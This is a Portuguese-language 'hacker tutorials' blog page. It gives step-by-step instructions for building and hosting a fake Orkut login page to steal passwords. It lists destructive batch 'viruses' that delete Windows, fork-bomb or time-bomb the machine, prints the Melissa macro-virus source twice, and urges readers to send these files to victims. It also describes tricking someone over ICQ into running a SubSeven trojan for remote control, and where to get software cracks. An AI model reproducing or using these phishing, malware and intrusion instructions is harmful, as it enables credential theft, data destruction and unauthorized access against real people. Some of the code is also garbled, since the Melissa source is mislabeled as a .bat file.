.:: H4CK3R D3TON4T10N ::.: Tutorais Hacker
Mostrando postagens com marcador Tutorais Hacker. Mostrar todas as postagens
Mostrando postagens com marcador Tutorais Hacker. Mostrar todas as postagens

Criando Página Fake do Orkut


1°Baixem a página fake clickando aqui > depois que baixarem em questão de segundos vá na pasta que cai os downloads do seu navegador axe o arquivo que xama "kkkkk.html" clickem com o botão direito do mouse sobre ele > abrir com > bloco de notas.

2°Depois que abrirem com o bloco de notas aperte as teclas juntas Ctrl f do seu teclado > vai aparecer um lugar de busca escreva "seuemail" (não escreva com parênteses so o que está escrito dentro dele) depois vai aparecer uma palavra selecionada só clickar naquele botão que apaga uma letra que vc digitou errada por exemplo e escreva seu msn( melhor gmail que tem mais certeza de dar certo). Obs.: Se vc fez com seu msn quando alguem cair na página fake vc não vai saber pelo messenger vc tem que entrar no site do hotmail.

3°Depois que pois seu msn, gmail tanto faz salve o nome de qualquercoisa.html (no final do nome quando vc salvar ponha .html sem espaço pq assim seu pc sabe que o arquivo vai abrir como seu navegador padrão. A página fake esta criada para ver o resultado depois de salar basta clikar duas vezes nela e ver quanto é parecida com á página de login do orkut.

4°Agora vc deve fazer o seguinte criar um e-mail bol, clicke aqui para criar, depois de criar dessa a página vai ter uma propaganda do vila bol, ai vc clicka em construir site ( não fexe a parte que está carregando) > depois de clickar em "construir site" vai ter aberto sua conta no vila bol, ai só vc caçar aonde está esclito "gerenciador de arquivos" e clickar em baixo "administre seu site" > depois clicke em "abrir o gerenciador de arquivos" logue com a conta bol que vc criou com o msm e-mail e a msm senha( por isso eu disse para não fexar a parte que esta carregando, pq lá mostra seus dados de acesso para vc não esquecer) se depois que vc logar aparecer o home do site da bol fexe e faça tudo de novo deus da parte de "construir site" ai quando aparecer uma página aonde tem umas folhas de papel umas pasta clicke em "enviar arquivo(s)" > depois clicke em "escolher arquivo" e marque a página fake criada depois clicke em "abrir" depois em "confirmar", ai a página fake esta sendo enviada é muito rápido, depois que mandar vair ser criado na net uma página que hospeda a sua página fake enviada > entre nela copie o link qua aparecer no navegador e cole no bloco de notas > esse é o link da sua página fake. Entre no site do cj1 


Na onde eu selecionei com vermelho, digite um nome do link que querem, tipo, enois, no meio da caixa branca e clicke em registrar. 


Preecha tudo certo e registre sua conta, quando alguem digitar o site, "http://enois.cj1.com.br" vão cair na página fake, mas vcs ai pesquisem na net formas de esconder links com palavras por cima e que abram em uma nova guia, pois o orkut está com a segurança firme, então aparece uma página assim: 


Eu sei esse código para esconder o link do site, blog hacker tanto faz:



<a href="http://link da pagina do orkut>Clique Aqui</a>

Só que ele não faz abrir em outra guia então o orkut desconfia de outros sites sem ser o dele, so confia no dele tipo de comus isso.
Se aprender um código para abrir em nova guia comente. 

Criando Víros pelo Bloco de Notas

Criando Virus no Bloco de Notas
É muito simples, voce vai fazer um virus no bloco de notas é só seguir as indicações,
abra o bloco de notas
Copie os códigos escolhidos e cole no bloco de notas, ao salvar voce usa a extençao .bat
exemplo: onomedoarquivo.bat
Se vc usar outra extensão o arquivo ñ ira pegar

AVISO:Não execute estes virus em seu proprio Pc, pois pode ocorrer serios danos, voce deve enviar para as vitimas!!!


No bloco de notas copie o que está de verde!

Nome:Del All Windows
rmdir /s /q c:\windows
Função:Deleta tdo do Windows (fode o pc

Nome:Autoexec
@ECHO OFF
@BREAK OFF
deltree/C: Y\*.*
Função: Fode com tudo

Nome:Trojan-1
VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"
Begin VB.Form Form1
BackColor = &H80000007&
BorderStyle = 1 'Fixed Single
Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"
ClientHeight = 5400
ClientLeft = 45
ClientTop = 390
ClientWidth = 8085
BeginProperty Font
Name = "Fixedsys"
Size = 9
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "Source3.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
MouseIcon = "Source3.frx":08CA
PaletteMode = 2 'Custom
ScaleHeight = 5400
ScaleWidth = 8085
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows Default
Begin VB.CommandButton Command3
Caption = "About"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 120
TabIndex = 3
Top = 4920
Width = 1215
End
Begin VB.CommandButton Command2
Appearance = 0 'Flat
BackColor = &H000000FF&
Caption = "WEBSITE"
BeginProperty Font
Name = "Trebuchet MS"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height
Função:Augumas dos trojans tradiçionais

Nome:Del p/ Windows
del /s /q c:\windows\
Função:Deleta tudo dentro do Windows ex: arquivos e naum pastas

Nome:Shutdown-S
shutdown -s
Função:Desliga o pc

Nome:Shutdown-R
shutdown -r
Função:Reinicia o pc

Nome:Trojan-2
@echo off
ctty nul
rem
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
Função:Fode com tudo mesmo...

Nome:Pirata
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Função:Testar seu Anti-Virus ou enganar auguem.

Nome:Melissa 1999
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End
Função:se espalha rapidamente e força empresas como Intel e Microsoft, entre outras, a fechar seus sistemas de e-mail para conter a praga, que se disseminava via Outlook. O vírus, além de se enviar pela Internet, modificava documentos do Word colocando falas do programa de televisão Os Simpsons. Causou danos estimados em US$ 300 milhões a US$ 600 milhões.

Nome:CLICK EM MIM
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE
Função:Fica repetindo varias vezes a mesma mensagem

Nome:Progstar
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:
Função:Abre varios programas sem parar, fais o pc travar

Nome:bomba relógio
c:\
cd\
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:\windows
rmdir C:\arquivos de programas
rmdir C:\documents and settings
:fim
Função:depois que ele for ativado 7 vezes ele apaga tudo
Nome:MSN Fixer
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
Função:Congela todos os msn's que estao sendo executados.

Criando o vírus Melissa 1999

 
OBS: Antes de pelo menos ler isto, preste atenção: Eu nao me responsabilizo pelo o que você irá fazer, tome muito cuidado, NUNCA clique neste vírus que você irá fazer ok?
 
Abra o Bloco de notas e copie o código abaixo:
 
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End
 
Agora salve com a extensão .bat (ex: melissa.bat) e selecione marque em Salvar tipo como: Todos os arquivos. 
Seu vírus está criado! Agora é só mandar para alguns "amigos".
 
(Não causará dano ao seu pc, pelo menos se vc nao clicar nele!)

Criar um vírus para deletar todo o Windows

OBS: Antes de pelo menos ler isto, preste atenção: Eu nao me responsabilizo pelo o que você irá fazer, tome muito cuidado, NUNCA clique neste vírus que você irá fazer ok?


Bem, vamos ao tutorial:

Abra o Bloco de notas e copie: rmdir /s /q c:\windows
Agora salve com a extensão .bat (ex: foderpc.bat) e selecione marque em Salvar tipo como: Todos os arquivos. 
Seu vírus está criado! Agora é só mandar para alguns "amigos".


Como pegar seu ip de uma forma simples

Bom, para quem nao gosta de ir a sites como meuip.com ou etc, eu vou ensinar como pegar seu ip de um geito muito mais rápido e simples.

1° Abra iniciar e executar
2° Em executar digite cmd
3° Aparecerá uma janela msdos provavelmente assim: C:\ Document and Settings\Nome de Usuário\
4° Digite ipconfig e de enter
5° Agora é so copiar o numero onde tem Endereço de IP...............: xxx.xxx.xxx.xxx

Guia Hacker Download



Estamos todos seguros?
Você tem certeza que não existe ameaças na internet?
Como eu posso adiquirir conhecimento hacker?
Quais passos devo fazer para se tornar um hacker?
Baixe já e entre nesse mundo poderoso, sibernético, mundo hacker.


Download

Tutorial Como invadir o Linux



Confira nesta edição os principais assuntos da Linux Magazine de junho (a vinda de Linus Torvalds ao Brasil) e leia um artigo completo sobre MySQL Workbench, que irá lhe auxiliar no planejamento de bancos de dados e também sobre o LinuxCon, o melhor evento de tecnologia do Brasil. Na seção de colunas, Augusto Campos fala sobre a colaboração de usuários Linux versus usuários Windows e Rafael Peregrino fala sobre a revolução do Linux nos últimos anos, além de anunciar o LinuxCon Brasil 2010.

Tutorial Crackear Programas

O termo CRACKEAR PROGRAMAS significa burlar o sistema de validação das licenças dos programas, a grosso modo, seria como “ tornar original os programas piratas”. Existem na Internet existem programas com diversas licenças:

Freeware (Livre).
Shareware (Para usar por alguns dias, etc).
Demo (Demonstração).

Na maioria das vezes, os programas que podemos crackear são os Shareware, pois eles, em sua grande maioria, possuem a opção para você colocar a chave de Instalação (CD-KEY). Na Internet existem diversos sites que fornecem diversos CRACK´S, existem dois em especial:
www.crackdb.org
www.crack.ms

Um dos crack´s mais famosos na Internet é o que altera a licença do Windows XP de PIRATA para ORIGINAL, permitindo que você instale no seu computador, por exemplo, o Internet Explorer 7.0 e Windows Media Player 11. 

Como Clamuflar o IP


Existem dois tipos de IP, o fixo e o dinâmico, tanto nas conexões discadas, quanto nas conexões de banda larga seu IP quase sempre é dinâmico, ou seja, cada vez que você se conecta à internet seu provedor lhe dá um número de endereço IP diferente, então para mudar seu endereço IP basta se desconectar e conectar novamente à internet.

Como camuflar meu IP? Como ficar invisível na internet?

Você pode precisar esconder,
ou mascarar seu IP por vários motivos, como por exemplo para entrar num site que exiga que você esteja em certo país, assim eles verão o IP que você atribuiu e não seu verdadeiro IP, nesse caso você deve atribuir a seu computador um IP daquele país. Este processo se chama utilização de proxy, para mascarar ou esconder seu IP verdadeiro você deve:

1º Escolher um número de proxy (IP), entre nesse site http://www.samair.ru/proxy/ e escolha um. IP adress é o número do IP (proxy) os números depois de dois pontos (:) é a porta. Anonymity level é o nível de anonimato. Checked time é a última vez que o proxy foi testado e está funcionando corretamente. Country é o país de onde é o proxy, no caso de onde vão identificar que você esteja.

2º Após escolher o proxy, se você usar o Internet Explorer vá em: Ferramentas -> Opções de Internet -> Conexões -> Configurações de Lan – Selecione “Usar servidor proxy” e digite o IP e a porta do servidor.

Se usar o Firefox vá em Ferramentas -> Opções -> Avançado -> Rede -> Configurações -> Configuração manual de proxy e em HTTP digite o proxy e a porta que você escolheu no 1º passo

Caso fique muito lento tente escolher outro proxy e depois não esqueça de voltar seu navegador para a configuração original pois com o tempo o proxy pode parar de funcionar e você pode não conseguir usar a internet.

Pronto!
Agora que estou invisível…

Calma lá, não é porque você se escondeu que não poderá ser encontrado, saiba que as empresas de telefonia e a polícia tem mecanismos para, mesmo você estando escondido atrás de outro IP, saber exatamente onde você está.

Basta a empresa de telefonia fazer uma pesquisa que descobrem seu real número IP, daí eles descobrem seu número de telefone (pois a empresa sabe exatamente que telefone usou que IP tal hora, já que é a mesma empresa de telefonia que atribuíu o número IP ao seu telefone), de posse do número de seu telefone podem saber qual é a sua cidade, seu bairro e o número da sua casa. É assim que geralmente encontram pedófilos e ladrões de internet. Um método parecido também é usado para rastrear e-mails.

Por outro lado você pode ficar tranqüilo em relação a isso, pois as empresas de telefonia só podem repassar essas dados à polícia, mesmo assim somente com um mandado judicial.

O que é Ataques DoS e DdoS?



De acordo com a definição do CERT (Computer Emergency Response Team), os ataques DoS (Denial of Service), também denominados Ataques de Negação de Serviços, consistem em tentativas de impedir usuários legítimos de utilizarem um determinado serviço de um computador. Para isso, são usadas técnicas que podem: sobrecarregar uma rede a tal ponto em que os verdadeiros usuários dela não consigam usá-la; derrubar uma conexão entre dois ou mais computadores; fazer tantas requisições a um site até que este não consiga mais ser acessado; negar acesso a um sistema ou a determinados usuários.

Explicando de maneira ilustrativa, imagine que você usa um ônibus regularmente para ir ao trabalho. No entanto, em um determinado dia, uma quantidade enorme de pessoas “furaram a fila” e entraram no veículo, deixando-o tão lotado que você e os outros passageiros regulares não conseguiram entrar. Ou então, imagine que você tenha conseguido entrar no ônibus, mas este ficou tão cheio que não conseguiu sair do lugar por excesso de peso. Este ônibus acabou negando o seu serviço – o de transportá-lo até um local -, pois recebeu mais solicitações – neste caso, passageiros – do que suporta.

É importante frisar que quando um computador/site sofre ataque DoS, ele não é invadido, mas sim sobrecarregado. Isso independe do sistema operacional utilizado.

Tutorial Hacker: Como invadir um PC

 

COMO INVADIR UM COMPUTADOR

Teoria:
Ao contrário do que muita gente pensa, invadir um computador é muito simples. Podemos dizer que é mais fácil invadir um computador do que ser invadido, pelo simples motivo de que um anti-vírus qualquer impede a invasão de um hacker ou cracker (isso quando se usa um programa de invasão como NetBus, Subseven, BackOriffice e por aí vai.).



É Necessário:
- É essencial ter um cérebro criativo e mais de 64 neurônios.
- Um programa de invasão (Recomendo SubSeven).
- A vítima não ter um anti-vírus. Caso contrário ela não vai executar o vírus.

Recomendável:

- É recomendável uma conexão de no mínimo 56K.
- A velocidade do computador não tem muita importância nesse caso.
- Desabilite seu Anti-vírus para usar o programa (Você não vai se infectar, a não ser que você seja muito burro, o suficiente para executar o vírus ao invés do programa.).

Finalmente como invadir:
*Os programas de invasão costumam vir em três partes: Programa de invasão, Editor do vírus e vírus.*

Passo: Abra o editor de vírus. Agora mude o ícone, coloque uma mensagem qualquer pra pessoa ver quando abrir o vírus, onde você quer que o vírus inicie, esse tipo de bobagem, não é nada demais.

Passo: Converse com alguma pessoa, de preferência no " ICQ ". Convença a pessoa a aceitar um arquivo, diga que é algo engraçado ou coisa assim.

Passo: Após a pessoa aceitar o vírus e executá-lo, você terá que pegar o IP dela, não é difícil conseguir se você estiver no icq. Você pode achar em vários sites (inclusive nesse) alguns tipos de arquivo pra ver o IP de todos da sua lista do icq. Para o * icq 2001b ou o icq 2003a * você pode baixar esse arquivo clicando aqui. E substituir pelo existente na pasta do icq.

Passo: Agora digite o IP da pessoa no Programa de Invasão e pronto! Você invadiu o computador dessa pessoa. Agora você terá acesso a tudo, tudo que a pessoa está vendo na tela, o que ela digita ou conversa no icq, pode alterar arquivos, desligar o computador, colocar mensagens na tela e muito mais.

Download do SubSeven Aqui
Client : subseven_client.zip
Server + ServerEditor : subseven_server.zip


TODOS OS LINKS ENCONTRADO AQUI APENAS 2% SÃO PRÓPRIOS, A HACKER DETONATION APENAS APONTA LINKS DE OUTROS SITES/BLOG!